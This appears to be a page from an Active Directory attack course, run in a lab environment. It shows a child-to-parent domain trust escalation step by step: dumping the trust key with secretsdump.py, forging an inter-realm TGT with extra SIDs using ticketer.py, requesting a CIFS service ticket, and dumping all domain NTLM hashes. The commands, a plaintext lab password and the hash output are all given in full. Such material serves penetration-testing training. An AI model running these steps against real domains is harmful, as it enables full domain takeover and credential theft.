> For the complete documentation index, see [llms.txt](https://watchdogsacademy.gitbook.io/attacking-active-directory/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://watchdogsacademy.gitbook.io/attacking-active-directory/trust/domain-trust-child-parent-north.newyork.local-greater-than-newyork.local/trust-ticket-forge-inter-realm-tgt.md).

# Trust ticket - forge inter-realm TGT

* Another way to escalate from child to parent is by extracting the trust key and use it to create our trust ticket (a very good explanation and examples with Mimikatz can be found here : <https://adsecurity.org/?p=1588>)
* The trust key can be found by targeting the netbios name of the domain on the ntds

```
secretsdump.py -just-dc-user 'NEWYORK$' \
 north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11
 
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
newyork$:1105:aad3b435b51404eeaad3b435b51404ee:59f1453dcd3f2fdc8c52f38693806154:::
[*] Kerberos keys grabbed
newyork$:aes256-cts-hmac-sha1-96:8d20b70ca945f979ff4ac5928e6f7397b43a3737ac9b1ee2579294c584bbe49e
newyork$:aes128-cts-hmac-sha1-96:05c2cc6747982c155cc82ccae92b8475
newyork$:des-cbc-md5:6e647ff89b08b089
[*] Cleaning up... 
```

<figure><img src="/files/rWSqwYdchpQhlgMZIrMQ" alt=""><figcaption></figcaption></figure>

* Now we got the trust key we can forge the ticket just like we done with the krbtgt user hash but this time we will set the spn : krbtgt/parent\_domain

```
ticketer.py -nthash 59f1453dcd3f2fdc8c52f38693806154 \ #newyork$ hash
 -domain-sid S-1-5-21-3634065772-4036021599-3644360361 \ #north.newyork.local SID
 -domain north.newyork.local \
 -extra-sid S-1-5-21-620482180-1620433373-1814187987-519 \ #newyork.local SID + Extra-SID
 -spn krbtgt/newyork.local trustfakeuser
```

<figure><img src="/files/9MVe8CQKCWwulnvbV8Av" alt=""><figcaption></figcaption></figure>

* Now we will use the forged TGT to ask a ST on the parent domain

```
export KRB5CCNAME=/home/jefe/delegation/trustfakeuser.ccache

getST.py -k -no-pass -spn cifs/nyc.newyork.local \
 newyork.local/trustfakeuser@newyork.local -debug
```

<figure><img src="/files/v3KIBfSdHBuySehmkDBN" alt=""><figcaption></figcaption></figure>

* And now we can use our service ticket :)
* connect with smbclient

```
export KRB5CCNAME=/workspace/trusts/trustfakeuser@newyork.local@cifs_nyc.newyork.local@NEWYORK.LOCAL.ccache
smbclient.py -k -no-pass trustfakeuser@nyc.newyork.local
```

<figure><img src="/files/wM5V0AyP0jyAsi5NDJl0" alt=""><figcaption></figcaption></figure>

* or even dump secrets

```
secretsdump.py -k -no-pass -just-dc-ntlm trustfakeuser@nyc.newyork.local
```

```
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9bd3def911c72eaa484fc6a302f3a08b:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Donald.Trump:1113:aad3b435b51404eeaad3b435b51404ee:5c4af7d7a0e3091678e947c3ed151b81:::
hugo.Chavez:1114:aad3b435b51404eeaad3b435b51404ee:12e3795b7dedb3bb741f2e2869616080:::
mateo.Pacheco:1115:aad3b435b51404eeaad3b435b51404ee:1ff4aa72d776c5834ba4893ab192f016:::
nicolas.Maduro:1116:aad3b435b51404eeaad3b435b51404ee:b3b3717f7d51b37fb325f7e7d048e998:::
marco.Lopez:1117:aad3b435b51404eeaad3b435b51404ee:9029cf007326107eb1c519c84ea60dbe:::
ramon.Maldonado:1118:aad3b435b51404eeaad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d:::
rafael.Smith:1119:aad3b435b51404eeaad3b435b51404ee:1e9ed4fc99088768eed631acfcd49bce:::
diego.Montenegro:1120:aad3b435b51404eeaad3b435b51404ee:af41d274ce3ba74423fbe596cf944710:::
lorenzo.Cruz:1121:aad3b435b51404eeaad3b435b51404ee:6c439acfa121a821552568b086c8d210:::
jesus.Puello:1122:aad3b435b51404eeaad3b435b51404ee:2c1854ada028754e5d16113cab23fe5d:::
martin.Osuna:1123:aad3b435b51404eeaad3b435b51404ee:02166150bda700bc7be38198179b20fc:::
NYC$:1001:aad3b435b51404eeaad3b435b51404ee:0a38be3c64921d206de05e782d09edb0:::
NORTH$:1104:aad3b435b51404eeaad3b435b51404ee:59f1453dcd3f2fdc8c52f38693806154:::
maryland$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
```

<figure><img src="/files/AcZpTbtzX6NVNoZNf3p1" alt=""><figcaption></figcaption></figure>
